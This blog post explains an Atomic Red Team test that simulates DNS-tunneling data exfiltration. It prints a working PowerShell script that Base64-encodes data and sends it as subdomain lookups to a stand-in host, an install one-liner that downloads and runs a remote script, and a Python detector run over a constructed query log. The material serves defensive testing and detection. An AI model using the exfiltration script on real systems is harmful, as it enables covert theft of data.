Sai Prashanth Pulisetti
3 min read · Jan 30, 2024

Enhancing Cyber Defense: Simulating DNS Tunneling for Data Exfiltration

Introduction

In today's threat landscape, understanding and mitigating advanced techniques is key to an effective defense. DNS tunneling, a method often used for data exfiltration, poses a significant challenge because it hides inside traffic that almost every network permits. This blog post introduces an atomic test I've developed to simulate this threat, offering a hands-on way to test and strengthen your defenses.

Understanding DNS Tunneling

DNS tunneling encodes the data of other programs or protocols inside DNS queries and responses. Malicious actors use it for data exfiltration or for establishing command and control (C2) channels, exploiting the fact that DNS is a trusted protocol, is almost always allowed out of the network, and is often less scrutinized than other traffic.

The Atomic Test: A Detailed Overview

The atomic test, available in the Atomic Red Team repository, is written for Windows environments. It simulates DNS tunneling for data exfiltration and takes the following input arguments:

  • dns_server: The DNS server's IP or domain name; each chunk is sent as a subdomain of this name.
  • exfiltrated_data: The data to be exfiltrated.
  • chunk_size: The number of Base64 characters placed in each DNS label (63 is the maximum length of a single label).

Code Integration and Explanation

The test is executed with PowerShell. Here's a breakdown of the script:

# Atomic Red Team substitutes the input arguments into the #{...} placeholders
$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}
# UTF-8 bytes -> Base64 text
$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
# -split with a capturing group returns the chunks interleaved with empty strings;
# drop the empty ones so no lookup of ".<dns_server>" is attempted
$chunks = $encodedData -split "(.{$chunkSize})" | Where-Object { $_ }
foreach ($chunk in $chunks) {
    # each chunk becomes the leftmost label of the query name
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

This script performs the following actions:

  1. Encodes exfiltrated_data as UTF-8 bytes and then as Base64 text.
  2. Splits the Base64 text into chunks of chunk_size characters.
  3. Constructs a DNS query name with each chunk as a subdomain of dns_server.
  4. Resolves each name with Resolve-DnsName, pausing 5 seconds between queries, to simulate data exfiltration.

Practical Example

Suppose you want to test exfiltrating the string “SecretDataToExfiltrate” to a DNS server at dns.example.com. The script will Base64-encode the data, split it into chunks of the specified chunk_size, and send each chunk as a subdomain of dns.example.com in its own DNS query.

Importance of This Test

This atomic test gives cybersecurity professionals a practical way to:

  • Identify gaps in DNS monitoring and filtering.
  • Train teams to detect and respond to DNS tunneling.
  • Assess the effectiveness of existing security controls against DNS-based threats.
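As an added example (not code from the post or from the Atomic Red Team project), the Python below rebuilds the query names the test produces for the post's inputs and then looks at them the way a defender would: a small detector runs over a constructed DNS query log and reassembles the Base64 payload from the flagged names. The log format, the thresholds and the grouping rule are assumptions chosen for this demonstration; the parent name c2.example.net is constructed, while dns.example.com and SecretDataToExfiltrate come from the post. Two signals are used because they fail differently: a 63-character chunk is long and Base64-shaped enough to stand out on its own, while small chunks slip past per-label checks and are caught only by counting how many distinct labels are queried under one parent.

```python
"""Added example, not code from the post or the Atomic Red Team project:
rebuild the query names the T1041 test emits for the post's inputs, then run a
small detector over a constructed DNS query log and reassemble the payload.
Log format, thresholds and the grouping rule are assumptions made for this demo."""
import base64
import binascii
import collections
import math
import re
from typing import Dict, List, Optional, Tuple

# ---- what the atomic test sends -------------------------------------------
def encode_to_labels(data: str, chunk_size: int) -> List[str]:
    """Base64-encode the data and cut it into labels of chunk_size characters.
    Mirrors the test's -split "(.{N})"; a capture-group split also yields empty
    strings between chunks, which are dropped here (the test as written turns
    them into lookups of '.<dns_server>')."""
    b64 = base64.b64encode(data.encode("utf-8")).decode("ascii")
    return [c for c in re.split(f"(.{{{chunk_size}}})", b64) if c]

def build_queries(data: str, dns_server: str, chunk_size: int) -> List[str]:
    """One query name per chunk, <chunk>.<dns_server>, as the test builds it."""
    return [f"{label}.{dns_server}" for label in encode_to_labels(data, chunk_size)]

# ---- detection side ---------------------------------------------------------
LABEL_LEN_THRESHOLD = 20      # assumption: demo value, baseline it per environment
ENTROPY_THRESHOLD = 3.0       # assumption: bits per character
DISTINCT_LABEL_THRESHOLD = 3  # assumption: distinct leftmost labels under one parent
# '+', '/' and '=' are not hostname characters, so raw Base64 labels stand out.
B64_LABEL = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def shannon_entropy(s: str) -> float:
    counts = collections.Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def is_suspicious_label(label: str) -> bool:
    """Long, Base64-shaped and high-entropy: the profile of an encoded chunk."""
    return (len(label) >= LABEL_LEN_THRESHOLD
            and B64_LABEL.match(label) is not None
            and shannon_entropy(label) >= ENTROPY_THRESHOLD)

def split_leftmost(qname: str) -> Tuple[str, str]:
    """'<label>.<rest>' -> (label, rest); the test carries each chunk in the leftmost label."""
    label, _, rest = qname.rstrip(".").partition(".")
    return label, rest

def parse_log(lines: List[str]) -> List[str]:
    """Constructed log format '<time> <client_ip> <qname> <qtype>'; returns the qnames."""
    return [parts[2] for parts in (line.split() for line in lines) if len(parts) == 4]

def detect_tunnels(lines: List[str]) -> Dict[str, Dict[str, object]]:
    """Flag a parent name when a label looks encoded (large chunks) or when many
    distinct labels are queried under it (small chunks evade per-label checks).
    Returns parent -> {'reason': ..., 'labels': [leftmost labels in log order]}."""
    labels_by_parent: Dict[str, List[str]] = collections.defaultdict(list)
    encoded_hit = set()
    for qname in parse_log(lines):
        label, parent = split_leftmost(qname)
        labels_by_parent[parent].append(label)
        if is_suspicious_label(label):
            encoded_hit.add(parent)
    hits: Dict[str, Dict[str, object]] = {}
    for parent, labels in sorted(labels_by_parent.items()):
        if parent in encoded_hit:
            hits[parent] = {"reason": "encoded-label", "labels": labels}
        elif len(set(labels)) >= DISTINCT_LABEL_THRESHOLD:
            hits[parent] = {"reason": "label-volume", "labels": labels}
    return hits

def reassemble(labels: List[str]) -> Optional[str]:
    """Join the leftmost labels in log order and try to Base64-decode them."""
    joined = "".join(labels)
    joined += "=" * (-len(joined) % 4)  # restore padding if the '=' label was lost
    try:
        return base64.b64decode(joined, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

# Constructed sample log: benign lookups plus two runs of the test with the post's
# string, one with chunk_size 63 to the post's dns.example.com and one with
# chunk_size 10 to a constructed c2.example.net.
RUN_63 = build_queries("SecretDataToExfiltrate", "dns.example.com", 63)
RUN_10 = build_queries("SecretDataToExfiltrate", "c2.example.net", 10)
SAMPLE_LOG = [
    "2024-01-30T10:00:01Z 10.0.0.5 www.example.com A",
    "2024-01-30T10:00:02Z 10.0.0.5 a-long-but-legitimate-hostname.corp.example.com A",
    *[f"2024-01-30T10:00:{3 + i:02d}Z 10.0.0.5 {q} A" for i, q in enumerate(RUN_63 + RUN_10)],
    "2024-01-30T10:00:09Z 10.0.0.7 update.example.org A",
]

if __name__ == "__main__":
    for parent, hit in detect_tunnels(SAMPLE_LOG).items():
        print(parent, hit["reason"], "->", reassemble(hit["labels"]))
```

Run it directly to see the flagged parents with their decoded payloads. In production the thresholds need a per-domain baseline (CDNs and some anti-virus reputation services legitimately generate many distinct labels under one parent), and the same reassembly step is what lets you confirm after a test run that the data really left through DNS and that your log source captured every chunk rather than only the first query.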

Implementing the Test

To use this test:

  1. Download the Atomic Red Team repository.
  2. If the execution framework or the atomics folder is already present on disk, use the -Force parameter during installation, as shown below, to erase and replace those folders.
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics -Force

Run the following command to verify that the latest repository has been installed successfully:


PS C:\Users\sasukeu> Invoke-AtomicTest T1041 -ShowDetails

[********BEGIN TEST*******]
Technique: Exfiltration Over C2 Channel T1041
Atomic Test Name: Text Based Data Exfiltration using DNS subdomains
Atomic Test Number: 2
Atomic Test GUID: c9207f3e-213d-4cc7-ad2a-7697a7237df9
Description: Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.

Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
$dnsQuery = $chunk + "." + $dnsServer
Resolve-DnsName -Name $dnsQuery
Start-Sleep -Seconds 5
}
Command (with inputs):
$dnsServer = "dns.example.com"
$exfiltratedData = "SecretDataToExfiltrate"
$chunkSize = 63

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
$dnsQuery = $chunk + "." + $dnsServer
Resolve-DnsName -Name $dnsQuery
Start-Sleep -Seconds 5
}
[!!!!!!!!END TEST!!!!!!!]


PS C:\Users\sasukeu>

Customizing Test Parameters

You can customize the test parameters (dns_server, exfiltrated_data, and chunk_size) directly on the command line by passing them with -InputArgs after the test number. For example:

Invoke-AtomicTest T1041 -TestNumbers 2 -InputArgs @{ "dns_server"="dns.example.com"; "exfiltrated_data"="SecretDataToExfiltrate"; "chunk_size"=63 }

Conclusion

By using the Invoke-AtomicTest command, you can easily run and customize Atomic Red Team tests, such as the DNS tunneling simulation. This test provides a practical and efficient way to assess and improve your defenses against covert data exfiltration techniques. Remember to execute this test in a controlled environment and review its output, together with your DNS logs and alerts, to understand how your security systems react to such scenarios.

Reference:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md#atomic-test-2---text-based-data-exfiltration-using-dns-subdomains

Sai Prashanth Pulisetti

A security geek with 3 years of experience in various security tools and methodologies. I expedite analysing malware samples in both static & dynamic analysis.